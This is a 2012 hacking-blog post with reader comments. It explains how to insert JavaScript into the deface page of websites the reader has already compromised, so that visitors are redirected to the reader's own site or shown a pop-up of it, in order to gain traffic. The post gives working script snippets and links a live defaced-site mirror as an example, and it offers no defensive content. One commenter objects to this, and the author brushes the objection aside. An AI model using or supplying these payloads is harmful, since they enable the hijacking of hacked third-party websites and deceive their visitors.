HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA

Saturday, 4 February 2012

How To Redirect A Website On Your Own Website

When Your Have Low Traffic on website/blog You can Get Traffic from Your defaced website. Just redirect the Defaced website on your Main website.



How To Redirect Defaced Website On your Website ???


For Redirecting hacked website to your website open the deface Page with Notepad And paste this code Anywhere, But closed the <> Properly


Code :- 
</SCRIPT><script> delayRedirect('http://www.hackersunderground.blogspot.com/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script> 


(replace http://www.hackersunderground.blogspot.com/ with your own website)


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title> 


Find this code in Your deface page and Paste the code just after This code 


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title></SCRIPT><script> delayRedirect(http://www.hackersunderground.blogspot.com/'); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>


pharming.jpg (480×261)Now save The Deface page and Upload on Defaced website :) The website will be redirect on your website !


See Live example of redirecting :-


http://legend-h.org/mirror/224785/fullaventura.com/jaihind.html

How To Add A Pop Up and Open Your website in a New window


If you want to Open Your website In a New Window (Pop-up) Paste this code 
<script language="javascript">
window.open('http://www.devilscafe.in/','','width=700,height=600')
</script> after  </title> 


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title> <script language="javascript">
window.open('http://www.hackersunderground.blogspot.com/','','width=700,height=600')
</script>


Dont Forgot to leave a Comment if you Like this ;)
 post by rishabh sharma hackersunderground

8 comments:

Anonymous said...

Yes I know, this is simple XSS and CSRF attack....but my question is...tell me the reason for posting this...I am 100% sure...this is not for educational purpose at all, because my dear friend you are not telling any where that how to protect from these attack....or what kind of attacks these are...you are straight away just foolishly giving code to naive peoples, who wants to be a wannabe hacker....If you want to be a great, then please spread knowledge, or protect other organizations...don't just try to become a dream hero among all the new bees.

hackersunderground said...

Hey bro.. Maine fb pai rply dia hai tumhe.

This is not hacking script.. This is simple tutorials to get traffic..

Anonymous said...

anyone knows how to redirect a link to saved web page on pc

hackersunderground said...

Tumhara matlab hai ki pc mai save page pai redirect karna chate ho??

Anonymous said...

yep

Anonymous said...

suppose ager koi google.com khole to vo saved page khul browser me

hackersunderground said...

Bro ye nhi ho sakta.. You only redirect to remote site which is on remoter server...

hackersunderground said...

Bro ye nhi ho sakta.. You only redirect to remote site which is on remoter server...

Post a Comment

 
Design by HACKERS UNDERGROUND
HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA